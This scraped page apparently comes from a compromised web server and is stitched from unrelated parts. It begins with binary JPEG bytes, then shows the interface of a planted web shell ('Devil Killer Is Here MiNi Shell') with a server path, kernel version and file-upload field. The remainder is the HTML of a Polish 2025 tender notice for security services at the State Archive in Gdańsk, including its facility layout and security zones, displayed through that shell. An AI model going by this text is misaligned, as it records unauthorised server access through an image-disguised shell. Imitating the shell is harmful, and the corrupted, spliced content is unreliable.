JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250212/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250212/0009991201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług ochrony osób i mienia w obiektach zajmowanych przez Archiwum Państwowe w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ARCHIWUM PAŃSTWOWE W GDAŃSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001057</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wałowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-858</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">apgda@gdansk.ap.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gdansk.ap.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Archiwum Państwowe </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług ochrony osób i mienia w obiektach zajmowanych przez Archiwum Państwowe w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b9c5664d-4d8b-489e-be44-e915e54a4c39</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00099912</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041781/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usług ochrony osób i mienia w obiektach zajmowanych przez Archiwum Państwowe w Gdańsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b9c5664d-4d8b-489e-be44-e915e54a4c39 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja z odbywa się przy wykorzystaniu Platformy e-Zamówienia, która<br/>dostępna jest pod adresem: https://ezamowienia.gov.pl/. Korzystanie z Platformy e-Zamówienia jest bezpłatne, lub ePUAPu<br/>https://epuap.gov.pl/wps/portal, na adres skrzynki Archiwum Państwowego w Gdańsku : /i1p2j2n3a6/SkrytkaESP lub poczty<br/>elektronicznej lub poczty elektronicznej e-mail: apgda@gdansk.ap.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za<br/>pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk<br/>„dodaj załącznik”).<br/>4. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym3 lub podpisem osobistym4,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny)<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia<br/>6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularza do komunikacji” wynosi 150 MB. (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza)<br/>8. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia (261.2.2025)<br/>9. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">opisany w dokumentach postępowania</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">opisany w dokumentach postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">261.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ruchomego) w obiektach Zamawiającego w systemie całodobowym, polegających na:<br/>1) bezpośredniej ochronie fizycznej,<br/>2) stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych systemach i urządzeniach<br/>alarmowych zamawiającego<br/>3) monitorowanie obrazów z lokalnych systemów telewizji obiektowej (CCTV)<br/>4) ochronie doraźnej przez grupy interwencyjne wykonawcy<br/>5) realizacji usług portierskich.<br/>2. Obiekty Zamawiającego podlegające ochronie:<br/>1) Archiwum Państwowe w Gdańsku ul. Wałowa 5 (obiekt wpisany na listę obiektów podlegających obowiązkowej ochronie)<br/>– o pow. użytkowej 2475,2 m² i kubaturze 12996 m3, zbudowany w kształcie litery V-w całości podpiwniczony, składa się z<br/>części administracyjnej trzykondygnacyjnej i magazynowej wraz z pracowniami - sześciokondygnacyjny.<br/>Archiwum Państwowe podzielone jest na strefy:<br/> I strefa – A<br/> II strefa – B i C<br/> III strefa - D<br/>2) Archiwum Państwowe w Gdańsku Oddział w Gdyni ul. Handlowa 11 (obiekt wpisany na listę obiektów podlegających<br/>obowiązkowej ochronie) pow. użytkowa 1611,16 m2 i kubaturze 10137,20 m3, Budynek podzielony na dwie strefy:<br/> I strefa- część administracyjna-.<br/> II strefa- Pracownia „Kwaśny Papier”<br/>3) Archiwum Państwowe w Gdańsku ul. Polanki 124a, (obiekt wpisany na listę obiektów podlegających obowiązkowej<br/>ochronie) w skład których wchodzą dwa odrębne budynki:<br/> Budynek nr 15 – dwukondygnacyjny, niepodpiwniczony, z jednym wejściem o pow. użytk. 589,25 m2 , kubatura 2845,40 m3<br/> Budynek „14”- jednokondygnacyjny, częściowo podpiwniczony, pow. użytk. 511,21 m2 , powierzchnia zabudowy 613, 8 m2<br/>kubatura 3521,36 m3.<br/>Teren wokół budynków w pełni ogrodzony, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Grupa interwencyjna SUFO własna czy korzystająca z podwykonawców</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.1 posiadania zdolności technicznej lub zawodowej:<br/>1.1.1.1. Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie, co<br/>najmniej dwie usługi polegające na co najmniej bezpośredniej ochronie fizycznej osób i mienia w budynku użyteczności<br/>publicznej (w rozumieniu §3 pkt 6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków<br/>technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 roku, Nr 75, poz. 690 ze zm.), o<br/>powierzchni użytkowej każdego z budynków minimum 2 000 m2, przy czym każda usługa była świadczona całodobowo<br/>przez nieprzerwany okres co najmniej 12 miesięcy, w tym co najmniej jedna usługa była świadczona w obiekcie<br/>podlegającym obowiązkowej ochronie przez SUFO. Łączna wartość zamówień nie może być niższa niż 500 000,00 zł<br/>(słownie: pięćset tysięcy 00/100 złotych) brutto.<br/>1.1.1.2. Warunek zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje:<br/>• minimum 10 (dziesięć) osób, które będą uczestniczyć w wykonywaniu zamówienia jako obsada Grupy Interwencyjnej<br/>(posiadającego status SUFO) i Uzbrojonego Stanowiska Interwencyjnego,uprawnionych do pracy z bronią na okaziciela,<br/>działającą na terenie miasta Gdańska i Gdyni – każda składająca się co najmniej dwóch uzbrojonych pracowników ochrony,<br/>którzy po uzyskaniu za pośrednictwem uzbrojonego stanowiska interwencyjnego informacji z urządzeń lub systemów<br/>alarmowych sygnalizujących zagrożenie chronionych osób lub mienia wspólnie udają się na teren obszaru, obiektu lub<br/>urządzenia podlegającego obowiązkowej ochronie na podstawie art. 5 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i<br/>mienia lub innego podmiotu chronionego z bronią palną, na podstawie zawartej umowy, w celu sprawdzenia stanu ich<br/>bezpieczeństwa lub realizacji zadań ochrony osób lub mienia w formie bezpośredniej ochrony fizycznej.<br/>• minimum 8 pracowników portierni (portierów)<br/>• minimum dwóch kwalifikowanych pracowników zabezpieczenia technicznego.<br/>1.1.1.3. Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje łącznie:<br/>• siecią radiową nadawczo-odbiorczą typu dyspozytorskiego, która swym zasięgiem będzie obejmować przynajmniej teren<br/>miasta Gdańska, przy czym łączność za pomocą tej sieci nie będzie realizowana na pasmach ogólnodostępnych tzw.<br/>obywatelskich oraz<br/>• dysponuje minimum 4 oznakowanymi pojazdami Grup Interwencyjnych z zainstalowanymi systemami GPS<br/>umożliwiającymi nadzór nad tymi pojazdami w czasie rzeczywistym,<br/>• aplikacją umożliwiającą stały całodobowy wgląd w sygnały generowane przez systemy sygnalizacji włamania i napadu i<br/>odbierane przez Uzbrojone Stanowisko Interwencji<br/>• magazynem do przechowywania broni i amunicji znajdującym się na terenie Trójmiasta, spełniającym wymagania o<br/>których mowa w §11,12,13 Rozporządzenia MSWiA z dnia 21 października 2011 roku<br/>a. całodobowym centrum monitorowania i kierowania ochroną posiadające status Uzbrojonego Stanowiska Interwencyjnego<br/>na terenie Trójmiasta – obsługiwane co najmniej przez jednego uzbrojonego pracownika ochrony, który po uzyskaniu<br/>informacji z urządzeń lub systemów alarmowych sygnalizujących zagrożenie podejmuje decyzję o rodzaju środków<br/>niezbędnych do jego usunięcia, które posiada nw. możliwości:<br/> protokół odbioru danych contact – ID<br/> możliwość rejestracji włączenie i wyłączenia systemu alarmowego (data, godzina)<br/> możliwość rejestracji numer kodu przypisanego pracownikowi użytego do włączenie i wyłączenia systemów alarmowych<br/>(identyfikacja imienna)<br/> sygnalizacja alarmu systemowego w przypadku nie włączenia lub nie wyłączenia systemu alarmowego<br/> sygnalizację rodzaju alarmu z dokładną lokalizacją miejsca<br/> sygnalizację usterek systemowych, prób sabotażu i inne<br/> możliwość reagowania na zadziałania systemów alarmowych poprzez łączność z patrolami interwencyjnymi<br/>- wydruku raportu z danego okresu – okres archiwizacji 12 miesięcy<br/>1.2. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają<br/>obowiązek ich posiadania;<br/>Warunek zostanie spełniony, jeżeli Wykonawca posiada:<br/>a. Koncesję MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia w zakresie usług ochrony<br/>osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej i zabezpieczenia technicznego, zgodną z ustawą z<br/>dnia 22 sierpnia 1997 r. o ochronie osób i mienia (j.t. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.) wraz ze wszystkimi<br/>decyzjami zmieniającymi, wydanymi do pierwotnego dokumentu.<br/>b. Decyzję Pomorskiego Komendanta Wojewódzkiego Policji o zezwolenie na posiadanie broni palnej na okaziciela przez<br/>grupy interwencyjne mające status SUFO.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek z pkt. a) musi zostać spełniony<br/>przez każdego wykonawcę odrębnie (każdego członka konsorcjum), pozostałe warunki mogą być spełnione łącznie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca składa wraz z<br/>ofertą aktualne na dzień składania ofert oświadczenie dotyczące spełniania warunków udziału w postępowaniu i przesłanek<br/>wykluczenia – wg wzoru - załącznik nr 1<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (np. wspólników spółki cywilnej, konsorcjum),<br/>oświadczenie dotyczące spełniania warunków udziału w postępowaniu<br/>i przesłanek wykluczenia (załącznik nr 1 do oferty), składa osobno każdy z Wykonawców wspólnie ubiegających się o zamówienie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.1. w<br/>celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu:<br/>6.1.1. wykazu usług wykonanych lub wykonywanych, o których mowa w Rozdziale 2, ust. 1, pkt 1.1.1.1 SWZ, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów<br/>określających czy usługi zostały wykonane lub są wykonywane należycie- wg załączonego wzoru- załącznik nr 2;<br/>6.1.2. Wykaz osób spełniających warunek określony w Rozdziale 2 ust. 1 pkt 1.1.1.2. SWZ wg załączonego wzoru – załącznik nr 3<br/>oraz Informację o ilości osób zatrudnionych na umowę o prace (w formularzu oferty)<br/>6.1.3.wykazu narzędzi i urządzeń technicznych, o których mowa w Rozdziale 2, ust. 1, pkt 1.1.1.3. SWZ, dostępnych Wykonawcy<br/>usługi w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami, wg załączonego wzoruzałącznik<br/>nr 4;<br/>6.1.4. wykazu wraz z opisem technicznym aplikacji umożliwiającej Zamawiającemu stały całodobowy wgląd w sygnały generowane<br/>przez systemy sygnalizacji włamania i napadu i odbierane przez USI wykonawcy załącznikiem nr 4.<br/>6.2. w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu<br/>na podstawie 109 ust. 1 pkt 4 ustawy Prawo zamówień publicznych:<br/>• odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 Ustawy będzie<br/>zobowiązany do złożenia w/w dokumentu również<br/>w odniesieniu do tych podmiotów.<br/>6.3. W celu potwierdzenia posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej wykonawca<br/>składa:<br/>• aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji w zakresie usług ochrony osób i mienia w formie<br/>bezpośredniej ochrony fizycznej na podstawie ustawy o ochronie osób i mienia z dnia 22 sierpnia 1997 roku (tj: Dz. U. z 2014 r, poz.<br/>1099 ze zm.),<br/>• decyzję Pomorskiego Komendanta Wojewódzkiego Policji na posiadanie broni palnej na okaziciela,<br/>• protokół odbioru magazynu do przechowywania broni i amunicji znajdującego się na terenie Trójmiasta, potwierdzającego<br/>spełnienie wymagań o których mowa w §11,12,13 Rozporządzenia MSWiA z dnia 21 października 2011 roku.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, polegać na<br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub do-świadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>5. Dokumenty składane przez wykonawców zagranicznych w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z<br/>udziału w postępowaniu na 